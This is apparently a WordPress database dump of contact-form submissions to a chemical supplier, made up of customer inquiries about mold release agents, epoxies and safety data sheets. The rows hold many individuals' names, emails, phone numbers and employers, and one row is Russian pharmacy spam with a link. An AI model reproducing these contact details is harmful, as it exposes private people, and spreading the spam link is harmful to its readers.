INSERT INTO `wp_postmeta` VALUES (37608, 4233, '_field_3', 'Hello, we are a company from Rumania, Europe.\n\nWe are interested in a High Temp grease 400 °C , please sent us a list of your products. Do you have any partners in UE for contact ?\n\n\nThank you.\n\n\nSincerely,\n\nCalin Ignat\nSales Manager\n\nGRANIT PIESE SRL\ntel. +4 0771 169 979\nwww.granit-parts.ro\n\n'); 
INSERT INTO `wp_postmeta` VALUES (37609, 4233, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37610, 4233, '_sub_id', '4233'); 
INSERT INTO `wp_postmeta` VALUES (37611, 4234, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37612, 4234, '_seq_num', '647'); 
INSERT INTO `wp_postmeta` VALUES (37613, 4234, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37614, 4234, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37615, 4234, '_field_1', 'Mike'); 
INSERT INTO `wp_postmeta` VALUES (37616, 4234, '_field_10', 'Pacific Radio'); 
INSERT INTO `wp_postmeta` VALUES (37617, 4234, '_field_2', 'mthiebold@pacrad.com'); 
INSERT INTO `wp_postmeta` VALUES (37618, 4234, '_field_8', '(818) 556-4177'); 
INSERT INTO `wp_postmeta` VALUES (37619, 4234, '_field_3', 'Hello\r\n\r\nI need a Certificate of Compliance for the MS260 please\r\n\r\nThank You'); 
INSERT INTO `wp_postmeta` VALUES (37620, 4234, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37621, 4234, '_sub_id', '4234'); 
INSERT INTO `wp_postmeta` VALUES (37623, 4237, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37624, 4237, '_seq_num', '648'); 
INSERT INTO `wp_postmeta` VALUES (37625, 4237, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37626, 4237, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37627, 4237, '_field_1', 'Jennifer Thompson'); 
INSERT INTO `wp_postmeta` VALUES (37628, 4237, '_field_10', 'Boeing'); 
INSERT INTO `wp_postmeta` VALUES (37629, 4237, '_field_2', 'jennifer.a.thompson2@boeing.com'); 
INSERT INTO `wp_postmeta` VALUES (37630, 4237, '_field_8', '(281) 226-4013'); 
INSERT INTO `wp_postmeta` VALUES (37631, 4237, '_field_3', 'I&#039;m trying to find information about a product that came from Miller Stephenson about 20 years ago. \n\nSupposedly the Miller Stephenson part number back then was MS143DF. \n\nBased on your website, it looks like that product is not available anymore. Do you have data sheets available for MS143DF? And is one of your current products meant to be a substitute for MS143DF?\n\nThanks!'); 
INSERT INTO `wp_postmeta` VALUES (37632, 4237, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37633, 4237, '_sub_id', '4237'); 
INSERT INTO `wp_postmeta` VALUES (37634, 4238, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (37635, 4238, '_seq_num', '290'); 
INSERT INTO `wp_postmeta` VALUES (37636, 4238, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37637, 4238, '_field_12', 'Alessandro Stuart Savoia'); 
INSERT INTO `wp_postmeta` VALUES (37638, 4238, '_field_13', 'Università Roma Tre - Dipartimento Ingegneria'); 
INSERT INTO `wp_postmeta` VALUES (37639, 4238, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (37640, 4238, '_field_14', 'alessandro.savoia@uniroma3.it'); 
INSERT INTO `wp_postmeta` VALUES (37641, 4238, '_field_15', '(328) 902-7632'); 
INSERT INTO `wp_postmeta` VALUES (37642, 4238, '_field_16', 'Dear Sir/Madame,\r\nI am writing to ask technical support before choosing the right mold release agent to be used in an electronic component packaging process. Miller-stephenson release agents were suggested by the manufacturer of the epoxy resin we are using in the process (Epotek 301) that needs to be casted using a viton-based mold and successively released. \r\n\r\nWe are working on an advanced MEMS packaging process on behalf of ST Microelectronics. The application is the following.\r\nWe realize viton-based molds with which we hold a silicon chip around its edges.\r\nThen, we cast an uncured epoxy resin in the mold, the Epotek 301, which encapsulates the silicon chip.\r\nWe then heat-cure the Epoxy at 70°C.\r\nFinally, we want to remove the viton-based mold from the resulting epoxy-silicon chip assembly.\r\nTherefore, since the resin adheres to the viton mold, we need to apply to a release agent on it before resin application.\r\n\r\nThe manufacturer (Epotek) suggests PTFE-based release agents but with other product we obtained not very good release performance. \r\n\r\nSo, I kindly ask you which is the best solution you can provide for this application.\r\nMoreover, could you please indicate a distributor for Italy or Europe where your products can be purchased?\r\n\r\nThank you and I look forward to hearing from you.\r\n\r\nBest regards,\r\nAlessandro Savoia\r\nRoma Tre University\r\nVia della Vasca Navale 84\r\n00146 - Rome\r\nItaly\r\nwww.cmut.it '); 
INSERT INTO `wp_postmeta` VALUES (37643, 4238, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (37644, 4238, '_sub_id', '4238'); 
INSERT INTO `wp_postmeta` VALUES (37645, 4239, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37646, 4239, '_seq_num', '649'); 
INSERT INTO `wp_postmeta` VALUES (37647, 4239, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37648, 4239, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37649, 4239, '_field_1', 'Alessandro Stuart Savoia'); 
INSERT INTO `wp_postmeta` VALUES (37650, 4239, '_field_10', 'Università Roma Tre - Dipartimento Ingegneria'); 
INSERT INTO `wp_postmeta` VALUES (37651, 4239, '_field_2', 'alessandro.savoia@uniroma3.it'); 
INSERT INTO `wp_postmeta` VALUES (37652, 4239, '_field_8', '(328) 902-7632'); 
INSERT INTO `wp_postmeta` VALUES (37653, 4239, '_field_3', 'Dear Sir/Madame,\r\nI am writing to ask technical support before choosing the right mold release agent to be used in an electronic component packaging process. Miller-stephenson release agents were suggested by the manufacturer of the epoxy resin we are using in the process (Epotek 301) that needs to be casted using a viton-based mold and successively released. \r\n\r\nWe are working on an advanced MEMS packaging process on behalf of ST Microelectronics. The application is the following.\r\nWe realize viton-based molds with which we hold a silicon chip around its edges.\r\nThen, we cast an uncured epoxy resin in the mold, the Epotek 301, which encapsulates the silicon chip.\r\nWe then heat-cure the Epoxy at 70°C.\r\nFinally, we want to remove the viton-based mold from the resulting epoxy-silicon chip assembly.\r\nTherefore, since the resin adheres to the viton mold, we need to apply to a release agent on it before resin application.\r\n\r\nThe manufacturer (Epotek) suggests PTFE-based release agents but with other product we obtained not very good release performance. \r\n\r\nSo, I kindly ask you which is the best solution you can provide for this application.\r\nMoreover, could you please indicate a distributor for Italy or Europe where your products can be purchased?\r\n\r\nThank you and I look forward to hearing from you.\r\n\r\nBest regards,\r\nAlessandro Savoia\r\nRoma Tre University\r\nVia della Vasca Navale 84\r\n00146 - Rome\r\nItaly\r\nwww.cmut.it '); 
INSERT INTO `wp_postmeta` VALUES (37654, 4239, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37655, 4239, '_sub_id', '4239'); 
INSERT INTO `wp_postmeta` VALUES (37656, 4240, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37657, 4240, '_seq_num', '650'); 
INSERT INTO `wp_postmeta` VALUES (37658, 4240, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37659, 4240, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37660, 4240, '_field_1', 'Dr.Rashmi'); 
INSERT INTO `wp_postmeta` VALUES (37661, 4240, '_field_10', 'Siddaganga Institute of Technology'); 
INSERT INTO `wp_postmeta` VALUES (37662, 4240, '_field_2', 'rash_mysore@yahoo.com'); 
INSERT INTO `wp_postmeta` VALUES (37663, 4240, '_field_8', '(974) 011-0576'); 
INSERT INTO `wp_postmeta` VALUES (37664, 4240, '_field_3', 'epoxy resin is needed for fabrication'); 
INSERT INTO `wp_postmeta` VALUES (37665, 4240, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37666, 4240, '_sub_id', '4240'); 
INSERT INTO `wp_postmeta` VALUES (37667, 4241, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37668, 4241, '_seq_num', '651'); 
INSERT INTO `wp_postmeta` VALUES (37669, 4241, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37670, 4241, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37671, 4241, '_field_1', 'Kent Lim'); 
INSERT INTO `wp_postmeta` VALUES (37672, 4241, '_field_10', 'Techlube Enterprise'); 
INSERT INTO `wp_postmeta` VALUES (37673, 4241, '_field_2', 'techlubeenterprise@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (37674, 4241, '_field_8', '(012) 392-3121'); 
INSERT INTO `wp_postmeta` VALUES (37675, 4241, '_field_3', 'We like to purchase MS-242 &amp; MS-122AD for 12 x 14 oz aerosol cans each type. Please advise us if you can ship out to Malaysia?'); 
INSERT INTO `wp_postmeta` VALUES (37676, 4241, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37677, 4241, '_sub_id', '4241'); 
INSERT INTO `wp_postmeta` VALUES (37678, 4242, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37679, 4242, '_seq_num', '652'); 
INSERT INTO `wp_postmeta` VALUES (37680, 4242, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37681, 4242, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37682, 4242, '_field_1', 'Jack Williams'); 
INSERT INTO `wp_postmeta` VALUES (37683, 4242, '_field_10', 'SiteHawk'); 
INSERT INTO `wp_postmeta` VALUES (37684, 4242, '_field_2', 'hawk2@sitehawk.com'); 
INSERT INTO `wp_postmeta` VALUES (37685, 4242, '_field_8', '(161) 545-9006'); 
INSERT INTO `wp_postmeta` VALUES (37686, 4242, '_field_3', 'Subject: Request for Safety Data Sheet - Post Foods Battle Creek\r\n\r\nHello\r\n\r\nPost Foods Battle Creek has contracted SiteHawk to help manage their SDS database for materials that are used at their facilities. As part of this service, SiteHawk is contacting their suppliers for updated SDS documents.If you need authorization, it can be provided. We have tried to retrieve the SDS for the products mentioned below from your website; however, we could not locate the same. Could you please send us the latest SDS for the following products in English language?\r\n\r\nWe have an older version of the MSDS for this product (Revision Date listed below along with the product name).If you have a newer version of SDS, could you please send them to us?\r\n\r\nThe products are:\r\n\r\n1) Product_Name: MS-530 DPMS-C0721A Contact Re-Nu®\r\n   ProductCodes: MS-530\r\n   Country of Mfr: United States\r\n   Revision Date of MSDS available with us: 11/01/2008\r\n   Language: English\r\n\r\n2) Product_Name: MS-532 DPMS-C0722B Contact Re-Nu®\r\n   ProductCodes: MS-532\r\n   Country of Mfr: United States\r\n   Revision Date of MSDS available with us: 11/01/2008\r\n   Language: English\r\n\r\nIf you are unable to provide SDS for the specified product, please respond with an explanation, so we can convey this to our client. When emailing us, please include a copy of the original inquiry and subsequent responses. If SDS is not required for product(s) above, please send us an exemption letter (i.e., a letter stating that the product is not hazardous and therefore does not require an SDS) stating the name of the product for which an SDS is not required.\r\n\r\nThe SDS can be emailed to hawk2@sitehawk.com or faxed to 1-888-871-8163, or mailed to:SDS Request, 709 Nissan Drive, Smyrna, TN 37167.\r\n\r\nThank you in advance for your assistance, please feel free to contact me if you have questions or require additional information.\r\n\r\n\r\nThanks,\r\nJack Williams\r\n\r\nSiteHawk\r\n709 Nissan Drive\r\nSmyrna TN 37167\r\nDirect: (615) 459-0064 Ext -705\r\nFax: 1-888-871-8163\r\nEmail: hawk2@sitehawk.com\r\nVisit us at: www.sitehawk.com'); 
INSERT INTO `wp_postmeta` VALUES (37687, 4242, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37688, 4242, '_sub_id', '4242'); 
INSERT INTO `wp_postmeta` VALUES (37689, 4243, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (37690, 4243, '_seq_num', '291'); 
INSERT INTO `wp_postmeta` VALUES (37691, 4243, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37692, 4243, '_field_12', 'Don Karnes'); 
INSERT INTO `wp_postmeta` VALUES (37693, 4243, '_field_13', 'Global Research &amp; development Inc.   539 Industrial Mile Rd. Columbus Ohio 43228'); 
INSERT INTO `wp_postmeta` VALUES (37694, 4243, '_field_18', 'no'); 
INSERT INTO `wp_postmeta` VALUES (37695, 4243, '_field_14', 'donovankarnes@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (37696, 4243, '_field_15', '(772) 205-5059'); 
INSERT INTO `wp_postmeta` VALUES (37697, 4243, '_field_16', 'I have been in contact with Chris concerning our requirement for a mold release .   The aplication --we are forming a alumina oxide tube within a stainless tube mold.   The tube we are forming is 22&quot; long 1.5&quot; OD X 1&quot; ID.    After forming the tube it is air dryed for 24 hours and then fired at 900C for 5 hours.   It is very important that the mold release leave no residue after firing.   Will call Chris tomorrow afternoon.\r\nDon'); 
INSERT INTO `wp_postmeta` VALUES (37698, 4243, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (37699, 4243, '_sub_id', '4243'); 
INSERT INTO `wp_postmeta` VALUES (37700, 4244, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (37701, 4244, '_seq_num', '292'); 
INSERT INTO `wp_postmeta` VALUES (37702, 4244, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37703, 4244, '_field_12', 'Joe Hoffman'); 
INSERT INTO `wp_postmeta` VALUES (37704, 4244, '_field_13', 'Northrop Grumman'); 
INSERT INTO `wp_postmeta` VALUES (37705, 4244, '_field_18', 'dont know'); 
INSERT INTO `wp_postmeta` VALUES (37706, 4244, '_field_14', 'joe.hoffman@ngc.com'); 
INSERT INTO `wp_postmeta` VALUES (37707, 4244, '_field_15', '(410) 260-5419'); 
INSERT INTO `wp_postmeta` VALUES (37708, 4244, '_field_16', 'we would like to bond together two pieces of Ultem 1000. can we use EPON 828 and EPIKURE 3140? or is there a better epoxy to use to bond this material together?\n\nplease note we are looking for the bond line to take the majority of the shear strength we will be pinning and screwing the bonded assembly together for position/ alignment but would like the epoxy to be the main structural component. Thank you.'); 
INSERT INTO `wp_postmeta` VALUES (37709, 4244, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (37710, 4244, '_sub_id', '4244'); 
INSERT INTO `wp_postmeta` VALUES (37711, 4245, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (37712, 4245, '_seq_num', '293'); 
INSERT INTO `wp_postmeta` VALUES (37713, 4245, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37714, 4245, '_field_12', 'Al Lakin'); 
INSERT INTO `wp_postmeta` VALUES (37715, 4245, '_field_13', 'Lockwood Industries DBA Fralock'); 
INSERT INTO `wp_postmeta` VALUES (37716, 4245, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (37717, 4245, '_field_14', 'alakin@fralock.com'); 
INSERT INTO `wp_postmeta` VALUES (37718, 4245, '_field_15', '(661) 367-9132'); 
INSERT INTO `wp_postmeta` VALUES (37719, 4245, '_field_16', 'I have a problem with molding PTFE.  Yep, it sticks to my mold surface (pretty good for a &quot;non-stick&quot; material, huh?)  Would MS-153 be suitable as a release?  How about Releasys HT?  I&#039;m prepared to try some and see what happens if you&#039;re willing to send a sample.'); 
INSERT INTO `wp_postmeta` VALUES (37720, 4245, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (37721, 4245, '_sub_id', '4245'); 
INSERT INTO `wp_postmeta` VALUES (37722, 4246, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37723, 4246, '_seq_num', '653'); 
INSERT INTO `wp_postmeta` VALUES (37724, 4246, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37725, 4246, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37726, 4246, '_field_1', 'Mahati Chintapalli'); 
INSERT INTO `wp_postmeta` VALUES (37727, 4246, '_field_10', 'PARC'); 
INSERT INTO `wp_postmeta` VALUES (37728, 4246, '_field_2', 'mahati.chintapalli@parc.com'); 
INSERT INTO `wp_postmeta` VALUES (37729, 4246, '_field_8', '(650) 812-4437'); 
INSERT INTO `wp_postmeta` VALUES (37730, 4246, '_field_3', 'I am interested in a mold release agent for solvent casting a polymer into an aluminum mold.  I am looking for excellent surface finish, high slip, chemical resistance, and temperature stability up to at least 250 F, and preferably a non-sacrifical mold.  Could you please recommend a product for this application?   Thanks for your assistance.'); 
INSERT INTO `wp_postmeta` VALUES (37731, 4246, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37732, 4246, '_sub_id', '4246'); 
INSERT INTO `wp_postmeta` VALUES (37733, 4247, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37734, 4247, '_seq_num', '654'); 
INSERT INTO `wp_postmeta` VALUES (37735, 4247, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37736, 4247, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37737, 4247, '_field_1', 'Jay Carlson'); 
INSERT INTO `wp_postmeta` VALUES (37738, 4247, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (37739, 4247, '_field_2', 'jay_carlson@tolomatic.com'); 
INSERT INTO `wp_postmeta` VALUES (37740, 4247, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (37741, 4247, '_field_3', 'We use a epoxy resin to pot a motor stator and presently use Slide Epoxease mold release agent No. 40614 but we don&#039;t like the toxicity of it. Do you offer a safer option with equivalent performance?'); 
INSERT INTO `wp_postmeta` VALUES (37742, 4247, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37743, 4247, '_sub_id', '4247'); 
INSERT INTO `wp_postmeta` VALUES (37744, 4248, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37745, 4248, '_seq_num', '655'); 
INSERT INTO `wp_postmeta` VALUES (37746, 4248, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37747, 4248, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37748, 4248, '_field_1', 'ViktrozchignEP'); 
INSERT INTO `wp_postmeta` VALUES (37749, 4248, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (37750, 4248, '_field_2', 'grnoskovatf2@mail.ru'); 
INSERT INTO `wp_postmeta` VALUES (37751, 4248, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (37752, 4248, '_field_3', 'Мы приглашаем на наш ресурс парней и взрослых мужиков, которые желают приобрести &lt;a href=&quot;http://viagra-tablet.ru/generik-viagra&quot;&gt;курс сиалиса&lt;/a&gt;  и похожие препараты по самой привлекательной цене в Рунете. \r\n \r\nМы продаём только прошедшие через сертификацию дженерики, производимые на самых лучших фармацевтических фабриках Европы и США. \r\n \r\nБлагодаря минимуму посредников между фабриками и покупателями, наша виртуальная аптека продаёт препараты для продления полового акта по самым небольшим ценам.'); 
INSERT INTO `wp_postmeta` VALUES (37753, 4248, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37754, 4248, '_sub_id', '4248'); 
INSERT INTO `wp_postmeta` VALUES (37755, 4249, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37756, 4249, '_seq_num', '656'); 
INSERT INTO `wp_postmeta` VALUES (37757, 4249, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37758, 4249, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37759, 4249, '_field_1', 'Kevin Betts'); 
INSERT INTO `wp_postmeta` VALUES (37760, 4249, '_field_10', 'Krohne Ltd'); 
INSERT INTO `wp_postmeta` VALUES (37761, 4249, '_field_2', 'k.betts@krohne.com'); 
INSERT INTO `wp_postmeta` VALUES (37762, 4249, '_field_8', '(193) 340-8684'); 
INSERT INTO `wp_postmeta` VALUES (37763, 4249, '_field_3', 'The above telephone number is  +44 1933 408684\n\nDo manufacture an epoxy resin to the below specification?\n\nEpoxy P/N 29885 Catalyst P/N 1470\nProperty Test Method Units Value Color Blue Hardness TP-311 Shore D 94 Flexural Strength ASTM-D-790 mPa 90 Compressive Strength TP-207 mPa 110 Tensile Strength TP-239 mPa 58 Water Absorbtion 24Hr Boil % 0.1 Coefficient of Thermal Expansion TMA 10^-6/C 30 Thermal Conductivity ASTM-D-2214 W/m.K 1.23 Temperature Range of Use C -55 to +155 Fire Resistance UL94 kV/mm V0 Dielectric Strength TP-297 19.3 Dielectric Constant TP-184 @ 60Hz 6.6 @ 1kHz 6.3 @ 1mHz 6 Dissipation Factor TP-184 @ 60Hz 0.02 @ 1kHz 0.01 @ 1mHz 0.02 Volume Resistivity @ 25C TP-183 &gt;10^16'); 
INSERT INTO `wp_postmeta` VALUES (37764, 4249, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37765, 4249, '_sub_id', '4249'); 
INSERT INTO `wp_postmeta` VALUES (37766, 4250, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (37767, 4250, '_seq_num', '294'); 
INSERT INTO `wp_postmeta` VALUES (37768, 4250, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37769, 4250, '_field_12', 'Matthew Parks'); 
INSERT INTO `wp_postmeta` VALUES (37770, 4250, '_field_13', 'Alion Science and Technology'); 
INSERT INTO `wp_postmeta` VALUES (37771, 4250, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (37772, 4250, '_field_14', 'mparks@alionscience.com'); 
INSERT INTO `wp_postmeta` VALUES (37773, 4250, '_field_15', '(703) 824-5342'); 
INSERT INTO `wp_postmeta` VALUES (37774, 4250, '_field_16', 'Hello, I am supporting a Navy project currently working through a gearbox testing process. In a recent Lube Oil analysis, high levels of silicon have been discovered in the sample taken from the gearbox. I have researched and am aware of the several potential origins of the silicon, but am trying to find what levels of silicon ( as in how many mg/kg, etc), would be cause enough for concern before foaming, or additional damage may occur. Please let me know if there is anything I can do, and if you can assist in answering my question.\r\nThank you, Matt Parks'); 
INSERT INTO `wp_postmeta` VALUES (37775, 4250, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (37776, 4250, '_sub_id', '4250'); 
INSERT INTO `wp_postmeta` VALUES (37777, 4251, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37778, 4251, '_seq_num', '657'); 
INSERT INTO `wp_postmeta` VALUES (37779, 4251, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37780, 4251, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37781, 4251, '_field_1', 'HERB RODRIGUEZ'); 
INSERT INTO `wp_postmeta` VALUES (37782, 4251, '_field_10', 'L3 TECHNOLOGIES'); 
INSERT INTO `wp_postmeta` VALUES (37783, 4251, '_field_2', 'HERB.RODRIGUES@L3T.COM'); 
INSERT INTO `wp_postmeta` VALUES (37784, 4251, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (37785, 4251, '_field_3', 'I&#039;m an Engineer that have been asked to review this matter:\nI understand that  dry lubricant MS-122v is being discontinued and the recommended/suggested replacement is MS-122XD.\ncould you please send me both MSDS&#039;s to compare the two. \nthank you '); 
INSERT INTO `wp_postmeta` VALUES (37786, 4251, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37787, 4251, '_sub_id', '4251'); 
INSERT INTO `wp_postmeta` VALUES (37788, 4252, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37789, 4252, '_seq_num', '658'); 
INSERT INTO `wp_postmeta` VALUES (37790, 4252, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37791, 4252, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37792, 4252, '_field_1', 'Curtis Reichel'); 
INSERT INTO `wp_postmeta` VALUES (37793, 4252, '_field_10', 'TSE Industreis, Inc'); 
INSERT INTO `wp_postmeta` VALUES (37794, 4252, '_field_2', 'curt.reichel@tse-industries.com'); 
INSERT INTO `wp_postmeta` VALUES (37795, 4252, '_field_8', '(727) 540-1304'); 
INSERT INTO `wp_postmeta` VALUES (37796, 4252, '_field_3', 'Could I please get SDS&#039;s for Sion and Suprion products as well as a budgetary cost of both products in drums?\n\nThank you,\n\nCurt'); 
INSERT INTO `wp_postmeta` VALUES (37797, 4252, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37798, 4252, '_sub_id', '4252'); 
INSERT INTO `wp_postmeta` VALUES (37799, 4253, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37800, 4253, '_seq_num', '659'); 
INSERT INTO `wp_postmeta` VALUES (37801, 4253, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37802, 4253, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37803, 4253, '_field_1', 'Ben Smith'); 
INSERT INTO `wp_postmeta` VALUES (37804, 4253, '_field_10', 'Actio Corporation'); 
INSERT INTO `wp_postmeta` VALUES (37805, 4253, '_field_2', 'sdssupport6@actio.net'); 
INSERT INTO `wp_postmeta` VALUES (37806, 4253, '_field_8', '(248) 987-3983'); 
INSERT INTO `wp_postmeta` VALUES (37807, 4253, '_field_3', 'Hello,\r\n\r\nGood Day!\r\n\r\nACTIO CORPORATION has been hired by Bridgestone Americas Inc  to manage its SDS library. We are going through the process of Bridgestone Americas Inc  SDS&#039;s. Please find below list of products which we requires the latest version SDS.\r\nProducts\r\n\r\nProduct - Alkon 9195L\r\n\r\n\r\n\r\n\r\nRequired GHS Format in English Language. If GHS format not available ANSI format will be prefered.\r\n\r\nThanking you in advance.'); 
INSERT INTO `wp_postmeta` VALUES (37808, 4253, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37809, 4253, '_sub_id', '4253'); 
INSERT INTO `wp_postmeta` VALUES (37810, 4254, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (37811, 4254, '_seq_num', '295'); 
INSERT INTO `wp_postmeta` VALUES (37812, 4254, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37813, 4254, '_field_12', 'Ryan Kordsmeier'); 
INSERT INTO `wp_postmeta` VALUES (37814, 4254, '_field_13', 'General Dynamics Mission Systems'); 
INSERT INTO `wp_postmeta` VALUES (37815, 4254, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (37816, 4254, '_field_14', 'ryan.kordsmeier@gd-ms.com'); 
INSERT INTO `wp_postmeta` VALUES (37817, 4254, '_field_15', '(336) 698-8271'); 
INSERT INTO `wp_postmeta` VALUES (37818, 4254, '_field_16', 'Hi,\r\n\r\nI am working on a potting application that we have traditionally used MS-122RB and MS-122E on in the past.  Are these part numbers no longer valid? If so, what would be the recommended formulation to use in their place?\r\n\r\nThanks,\r\nRyan'); 
INSERT INTO `wp_postmeta` VALUES (37819, 4254, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (37820, 4254, '_sub_id', '4254'); 
INSERT INTO `wp_postmeta` VALUES (37821, 4255, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (37822, 4255, '_seq_num', '660'); 
INSERT INTO `wp_postmeta` VALUES (37823, 4255, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37824, 4255, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (37825, 4255, '_field_1', 'Ronnie Marshall'); 
INSERT INTO `wp_postmeta` VALUES (37826, 4255, '_field_10', 'Industrial Plating and Machine, Inc. '); 
INSERT INTO `wp_postmeta` VALUES (37827, 4255, '_field_2', 'rmarshall@indplat.com'); 
INSERT INTO `wp_postmeta` VALUES (37828, 4255, '_field_8', '(304) 325-8196'); 
INSERT INTO `wp_postmeta` VALUES (37829, 4255, '_field_3', 'Good Afternoon,\nWe are pouring melted lead into a aluminum grid plate. We are having trouble getting the lead to release when it cools, from the aluminum mold. Do you have a release agent that would help in this process? I look forward to hearing from you. Thanks. '); 
INSERT INTO `wp_postmeta` VALUES (37830, 4255, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (37831, 4255, '_sub_id', '4255'); 
INSERT INTO `wp_postmeta` VALUES (37832, 4256, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (37833, 4256, '_seq_num', '296'); 
INSERT INTO `wp_postmeta` VALUES (37834, 4256, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (37835, 4256, '_field_12', 'Hector Guido'); 
INSERT INTO `wp_postmeta` VALUES (37836, 4256, '_field_13', 'RBC Bearings'); 
INSERT INTO `wp_postmeta` VALUES (37837, 4256, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (37838, 4256, '_field_14', 'hguido@rbcbearings.com'); 
INSERT INTO `wp_postmeta` VALUES (37839, 4256, '_field_15', '(909) 731-3523'); 
